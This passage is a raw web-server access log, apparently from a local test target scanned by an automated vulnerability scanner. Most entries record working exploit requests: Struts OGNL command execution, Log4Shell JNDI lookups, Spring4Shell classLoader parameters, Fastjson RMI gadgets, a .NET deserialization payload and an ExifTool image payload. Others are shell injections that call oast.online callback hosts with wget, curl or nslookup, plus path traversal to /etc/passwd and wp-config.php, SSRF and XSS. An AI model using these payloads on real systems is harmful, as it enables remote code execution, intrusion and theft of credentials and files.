Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fca286t0smpvbatig07h0ncqmhx196c6eh.oast.online%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.ca286t0smpvbatig07h09b5m8sozw38jo.oast.online}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://ca286t0smpvbatig07h0tqzqi7osxdngj.oast.online%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?class.module.classLoader.resources.context.configFile=https://ca286t0smpvbatig07h0p4s5t9fextqdt.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca286t0smpvbatig07h0hbqytuwda3ot6.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=dLji@vicL&url=http://ca286t0smpvbatig07h0s9u7xsq63m7nr.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup ca286t0smpvbatig07h0pbnfygwjdy3cp.oast.online\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://ca286t0smpvbatig07h0mrngfuai3dkar.oast.online)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://ca286t0smpvbatig07h064sk8f6i6zmgc.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.xbean.propertyeditor.JndiConverter\x22,\x0D\x0A \x22AsText\x22:\x22rmi://ca286t0smpvbatig07h0bdmeh9b8s8fyh.oast.online/exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"type=url&data=http%3A%2F%2Fca286t0smpvbatig07h0suw1xrx9zjzcc.oast.online%2F&xmlaction=preview&node=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /getFavicon?host=http://ca286t0smpvbatig07h0pna9mrsrj9dhf.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"${jndi:ldap://127.0.0.1#.${hostName}.useragent.ca286t0smpvbatig07h0edoafo1nop1bw.oast.online}", "http_referer":"${jndi:ldap://127.0.0.1#.${hostName}.referer.ca286t0smpvbatig07h0wrmnxr5nhqtg3.oast.online}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.ca286t0smpvbatig07h03dak8ktms4c6o.oast.online}"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.jpg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0AAT&TFORM\x00\x00\x03\xAFDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99 !\xC8\x91N\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8k\xE6D\x0F,q\x02\xEEI\xD3n\x95\xBD\xA2\xC3\x22?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0Fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB17\xD9\x7F*\x89\x00BG44\x00\x00\x00\x04\x01\x0F\xF9\x9FBG44\x00\x00\x00\x02\x02\x0AFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0A\x09(Copyright \x22\x5C\x0A\x22 . qx{curl `whoami`.ca286t0smpvbatig07h04ic4mids3mcrr.oast.online} . \x5C\x0A\x22 b \x22) ) \x0A\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5--\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /uploads/user HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /minio/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"class.module.classLoader.resources.context.configFile=https://ca286t0smpvbatig07h0w9hsj99twsmjw.oast.online&class.module.classLoader.resources.context.configFile.content.aaa=xxx\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpunit.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /npm-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/logon.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bower.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/123contactform-for-wordpress/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/rest/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", 